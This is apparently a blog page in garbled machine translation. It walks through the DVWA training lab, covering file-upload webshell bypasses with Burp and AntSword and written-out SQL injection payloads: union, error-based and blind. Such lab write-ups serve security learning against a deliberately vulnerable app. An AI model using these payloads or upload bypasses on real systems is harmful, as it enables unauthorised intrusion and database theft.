当前位置:网站首页>DVWA range exercise 4
DVWA range exercise 4
2022-07-04 12:40:00 【chenjyboke】
file upload( Upload files )
low
File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .
Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .

Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .



Mdeium
Check the source code and find that the file type limit should be jepg Or for png

Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect


SQL injection(sql Inject )
low
1、 Determine the type of Injection
Input 1 success , Input 1 and1=1 success Input 1’ Failure
It is judged as digital injection

2、 guess sql The number of fields in the query statement
Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2


3、 Get users , database , Version number
Input 1' union select 1,concat(user(),database(),version())#
4, Gets the tables in the database
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
Check in the response package

Repeat the above steps
2. Number of blasting tables : id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

3. Name of blasting table : id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#

4. Blast users Field name
id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#

SQL injection(sql Injection blind injection )
Determine the injection type and sql Inject the same
Judge the length of the database
Input 1’ and length(database())=1 #, Show that there is no ;
Input 1’ and length(database())=2 #, Show that there is no ;
Input 1’ and length(database())=3 #, Show that there is no ;
Input 1’ and length(database())=4 #, Show the presence of :

边栏推荐
- MySQL advanced (Advanced) SQL statement
- Recommend a cool geospatial data visualization tool with low code
- Snowflake won the 2021 annual database
- Bottom Logic -- Mind Map
- Practice of retro SOAP Protocol
- Servlet learning notes
- When synchronized encounters this thing, there is a big hole, pay attention!
- C language: the sorting problem of circle number reporting
- VBA, JSON interpretation, table structure -json string conversion
- Entity framework calls Max on null on records - Entity Framework calling Max on null on records
猜你喜欢

Source code analysis of the implementation mechanism of multisets in guava class library

Show recent errors only command /bin/sh failed with exit code 1

Paper notes ACL 2020 improving event detection via open domain trigger knowledge
![[solve the error of this pointing in the applet] SetData of undefined](/img/19/c34008fbbe1175baac2ab69eb26e05.jpg)
[solve the error of this pointing in the applet] SetData of undefined
![[the way of programmer training] - 2 Perfect number calculation](/img/fd/4bb8560f601daddaa8895f20215be4.jpg)
[the way of programmer training] - 2 Perfect number calculation

13、 C window form technology and basic controls (3)

I want to talk about yesterday

The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
![[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 12](/img/b1/926d9b3d7ce9c5104f3e81974eef07.jpg)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 12

Memory computing integration: AI chip architecture in the post Moorish Era
随机推荐
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
Fastlane 一键打包/发布APP - 使用记录及踩坑
When synchronized encounters this thing, there is a big hole, pay attention!
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 22
MPLS experiment
How to use the mongodb ID array to get multiple documents- How to get multiple document using array of MongoDb id?
13、 C window form technology and basic controls (3)
Clion configuration of opencv
It's hard to hear C language? Why don't you take a look at this (V) pointer
I want to talk about yesterday
Method of setting default items in C # ComboBox control code
Fly tutorial 02 advanced functions of elevatedbutton (tutorial includes source code) (tutorial includes source code)
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 17
【数据聚类】第四章第一节3:DBSCAN性能分析、优缺点和参数选择方法
Snowflake won the 2021 annual database
Recommend a cool geospatial data visualization tool with low code
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 13
Review of week 278 of leetcode II
Daily Mathematics Series 57: February 26
VBA, JSON interpretation, table structure -json string conversion